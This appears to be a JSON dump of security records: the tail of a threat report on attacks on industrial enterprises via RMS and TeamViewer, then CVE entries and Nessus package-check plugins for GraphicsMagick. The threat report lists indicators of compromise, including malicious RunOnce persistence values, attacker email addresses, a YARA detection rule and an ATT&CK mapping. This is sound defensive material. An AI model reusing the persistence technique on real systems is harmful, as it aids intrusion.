dncars[.]ru (RemoteAdmin.Win32.RemoteManipulator.vpj)\n\n**Yara Rules**\n \n \n rule TeamViewer_ver6_and_lower {\n meta:\n description = \"Rule to detect TeamViewer ver 6.0 and lower\" \n hash = \"4f926252e22afa85e5da7f83158db20f\"\n hash = \"8191265c6423773d0e60c88f6ecc0e38\"\n version = \"1.1\" \n condition:\n uint16(0) == 0x5A4D and \n pe.version_info[\"CompanyName\"] contains \"TeamViewer\" and \n (pe.version_info[\"ProductVersion\"] contains \"6.0\" or\n pe.version_info[\"ProductVersion\"] contains \"5.1\" or\n pe.version_info[\"ProductVersion\"] contains \"5.0\" or\n pe.version_info[\"ProductVersion\"] contains \"4.1\" or\n pe.version_info[\"ProductVersion\"] contains \"4.0\" or\n pe.version_info[\"ProductVersion\"] contains \"3.6\" or\n pe.version_info[\"ProductVersion\"] contains \"3.5\" or\n pe.version_info[\"ProductVersion\"] contains \"3.4\" or\n pe.version_info[\"ProductVersion\"] contains \"3.3\" or\n pe.version_info[\"ProductVersion\"] contains \"3.2\" or\n pe.version_info[\"ProductVersion\"] contains \"3.1\" or\n pe.version_info[\"ProductVersion\"] contains \"3.0\")\n }\n\nThe attackers use outdated versions of the TeamViewer client that contain a vulnerability enabling them to hide the utility's graphic interface. This YARA rule can be used to determine whether there are outdated versions of the TeamViewer software installed on the system. Checking whether any such software found was installed legitimately is a first-priority task.\n\nIf instances of outdated versions of the TeamViewer client being used legitimately are identified, it is recommended that the software in question be updated to the latest version.\n\n**Registry keys**\n\n * Key: \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll32 \nValue: \nrundll32.exe shell32.dll,ShellExec_RunDLL \n"%AppData%\\Roaming\\TeamViewer\\5\\TeamViewer.exe"\n * Key: \nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\CCFTray \nValue: \nrundll32.exe shell32.dll,ShellExec_RunDLL "%temp%\\TeamViewer.exe"\n\n**Threat actors' email addresses**\n\n * timkas@protonmail.com\n * smoollsrv@gmail.com\n * nataly@z-wavehome.ru\n * info@dncars.ru\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\n**Tactic** | **Technique/Subtechnique** | **Description** \n---|---|--- \n**Initial Access** | T1566.001 | **Phishing: Spearphishing Attachment**\n\nThe attackers use phishing emails with archives containing malicious scripts \n**Execution** | T1204.002 | **User Execution: Malicious File**\n\nMalicious software is executed when the user opens the file \nT1059.007 | **Command and Scripting Interpreter: JavaScript/Jscript **\n\nUsed to execute malicious PE and open bait PDF files \n**Persistence** | T1547.001 | **Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder**\n\nThe malware creates a registry value to run automatically after system restart \n**Defense Evasion** | T1027.002 | **Obfuscated Files or Information: Software Packing**\n\nTo make analysis more difficult, files of the malware are packed and its code is obfuscated \nT1564.001 | **Hide Artifacts: Hidden Files and Directories**\n\nThe attributes "hidden" and "system" are assigned to malware files \nT1574.001 | **Hijack Execution Flow: DLL Search Order Hijacking**\n\nTo hide the GUI of the TeamViewer remote administration utility, a malicious program is loaded into the process instead of a system library \nT1036.005 | **Masquerading: Match Legitimate Name or Location**\n\nIn most cases, attackers disguise malware components as Windows operating system components to hide the traces of malicious activity in the system \n**Credential Access** | T1003.001 | **OS Credential Dumping: LSASS Memory**\n\nThe attackers use the Mimikatz utility in cases where they need authentication credentials to infect other systems in an organization \nT1056.001 | **Input Capture: Keylogging**\n\nIn some cases, malware (class: Spyware) designed to collect logins and passwords for various different programs and services, record keypresses and capture screenshots is downloaded to an infected system \n**Discovery** | T1057 | **Process Discovery**\n\nThe malware collects information on antivirus software running on the system \nT1018 | **Remote System Discovery**\n\nThe attackers explore the organization's other systems to which they can gain access over the network \nT1518 | **Software Discovery**\n\nThe attackers take notes on which software associated with financial operations is installed on an infected system \n**Lateral Movement** | T1021.001 | **Remote Services: Remote Desktop Protocol**\n\nRDP connections with account credentials obtained earlier using the Mimikatz utility are used for lateral movement \n** \n****Collection** | T1005 | Data from Local System\n\nThe attackers analyze documents found on infected systems; these documents can be used in subsequent attacks \nT1114.001 | **Email Collection: Local Email Collection**\n\nThe attackers analyze the business correspondence of the organization under attack in order to use it for subsequent attacks on the victim's business partners \nT1056.001, T1113 | **Input Capture: Keylogging and Screen Capture**\n\nIn some cases, malware (class: Spyware) designed to collect logins and passwords for various different programs and services, record keypresses and capture screenshots is downloaded to an infected system \n**Command And Control** | T1071.001 | **Application Layer Protocol: Web Protocols**\n\nTo send the TeamViewer ID, an HTTP POST request is sent to the RMS server \nT1071.003 | **Application Layer Protocol: Mail Protocols**\n\nThe RMS server sends an email to an address controlled by the attackers. The email contains the infected machine's TeamViewer ID \nT1219 | **Remote Access Software**\n\nThe attackers use the TeamViewer remote administration utility to connect to the infected system \n**Exfiltration** | T1020 | **Automated Exfiltration**\n\nThe attackers use malware to receive information collected on the infected system \n**Impact** | T1565.001 | **Data Manipulation: Stored Data Manipulation**\n\nSubstitution of bank details in payment forms", "modified": "2020-11-05T10:00:48", "published": "2020-11-05T10:00:48", "id": "SECURELIST:7C93C981FC4D1BF9FB25258CFD00EFCD", "href": "https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer-new-data/99206/", "type": "securelist", "title": "Attacks on industrial enterprises using RMS and TeamViewer: new data", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:52:32", "description": "A cross-site scripting (XSS) vulnerability in the Manage Filters page (manage_filter_page.php) in MantisBT 2.1.0 through 2.17.1 allows remote attackers (if access rights permit it) to inject arbitrary code (if CSP settings permit it) through a crafted project name.", "edition": 6, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-10-30T18:29:00", "title": "CVE-2018-17782", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17782"], "modified": "2018-12-07T14:39:00", "cpe": ["cpe:/a:mantisbt:mantisbt:2.17.1"], "id": "CVE-2018-17782", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17782", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mantisbt:mantisbt:2.17.1:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2020-09-18T11:03:35", "description": "It was discovered that GraphicsMagick incorrectly handled certain\nimage files. An attacker could possibly use this issue to cause a\ndenial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-01-23T00:00:00", "title": "Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4248-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-17783", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-17782", "CVE-2017-17503", "CVE-2017-16547", "CVE-2017-17500", "CVE-2017-16669", "CVE-2017-16545", "CVE-2017-17501"], "modified": "2020-01-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04", "p-cpe:/a:canonical:ubuntu_linux:graphicsmagick", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick++-q16-12", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3"], "id": "UBUNTU_USN-4248-1.NASL", "href": "https://www.tenable.com/plugins/nessus/133207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4248-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133207);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\");\n script_xref(name:\"USN\", value:\"4248-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4248-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that GraphicsMagick incorrectly handled certain\nimage files. An attacker could possibly use this issue to cause a\ndenial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4248-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected graphicsmagick, libgraphicsmagick++-q16-12 and /\nor libgraphicsmagick-q16-3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick++-q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"graphicsmagick\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick++-q16-12\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libgraphicsmagick-q16-3\", pkgver:\"1.3.23-1ubuntu0.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"graphicsmagick / libgraphicsmagick++-q16-12 / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T01:54:14", "description": "Several vulnerabilities have been discovered in GraphicsMagick, a set\nof command-line applications to manipulate image files, which could\nresult in denial of service or the execution of arbitrary code if\nmalformed image files are processed.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-18T00:00:00", "title": "Debian DSA-4321-1 : graphicsmagick - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13063", "CVE-2017-17783", "CVE-2017-17915", "CVE-2017-10794", "CVE-2017-15277", "CVE-2017-14997", "CVE-2017-17913", "CVE-2017-11641", "CVE-2017-13777", "CVE-2017-10799", "CVE-2017-13775", "CVE-2018-6799", "CVE-2017-17502", "CVE-2017-13737", "CVE-2017-11722", "CVE-2017-18220", "CVE-2017-12936", "CVE-2017-17498", "CVE-2017-18229", "CVE-2017-13776", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-11638", "CVE-2017-17782", "CVE-2017-16352", "CVE-2017-17503", "CVE-2017-18231", "CVE-2017-11102", "CVE-2017-18230", "CVE-2017-14994", "CVE-2017-16547", "CVE-2017-15238", "CVE-2017-11643", "CVE-2017-11403", "CVE-2017-15930", "CVE-2017-18219", "CVE-2017-11139", "CVE-2017-17500", "CVE-2017-14504", "CVE-2017-10800", "CVE-2018-9018", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-11642", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-11140", "CVE-2017-16545", "CVE-2017-12937", "CVE-2017-12935", "CVE-2017-17501", "CVE-2018-5685", "CVE-2017-13064", "CVE-2017-17912", "CVE-2017-11637"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4321.NASL", "href": "https://www.tenable.com/plugins/nessus/118179", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4321. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118179);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/15 14:20:30\");\n\n script_cve_id(\"CVE-2017-10794\", \"CVE-2017-10799\", \"CVE-2017-10800\", \"CVE-2017-11102\", \"CVE-2017-11139\", \"CVE-2017-11140\", \"CVE-2017-11403\", \"CVE-2017-11636\", \"CVE-2017-11637\", \"CVE-2017-11638\", \"CVE-2017-11641\", \"CVE-2017-11642\", \"CVE-2017-11643\", \"CVE-2017-11722\", \"CVE-2017-12935\", \"CVE-2017-12936\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-13737\", \"CVE-2017-13775\", \"CVE-2017-13776\", \"CVE-2017-13777\", \"CVE-2017-14314\", \"CVE-2017-14504\", \"CVE-2017-14733\", \"CVE-2017-14994\", \"CVE-2017-14997\", \"CVE-2017-15238\", \"CVE-2017-15277\", \"CVE-2017-15930\", \"CVE-2017-16352\", \"CVE-2017-16353\", \"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\", \"CVE-2017-17912\", \"CVE-2017-17913\", \"CVE-2017-17915\", \"CVE-2017-18219\", \"CVE-2017-18220\", \"CVE-2017-18229\", \"CVE-2017-18230\", \"CVE-2017-18231\", \"CVE-2018-5685\", \"CVE-2018-6799\", \"CVE-2018-9018\");\n script_xref(name:\"DSA\", value:\"4321\");\n\n script_name(english:\"Debian DSA-4321-1 : graphicsmagick - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in GraphicsMagick, a set\nof command-line applications to manipulate image files, which could\nresult in denial of service or the execution of arbitrary code if\nmalformed image files are processed.\"\n );\n # https://security-tracker.debian.org/tracker/source-package/graphicsmagick\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e247f871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/graphicsmagick\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4321\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the graphicsmagick packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 1.3.30+hg15796-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick++-q16-12\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick-q16-3\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.30+hg15796-1~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:39:22", "description": "Various security issues were discovered in Graphicsmagick, a\ncollection of image processing tools. Heap-based buffer overflows or\noverreads may lead to a denial of service or disclosure of in-memory\ninformation or other unspecified impact by processing a malformed\nimage file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-28T00:00:00", "title": "Debian DLA-1401-1 : graphicsmagick security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13063", "CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-17782", "CVE-2016-3716", "CVE-2017-17503", 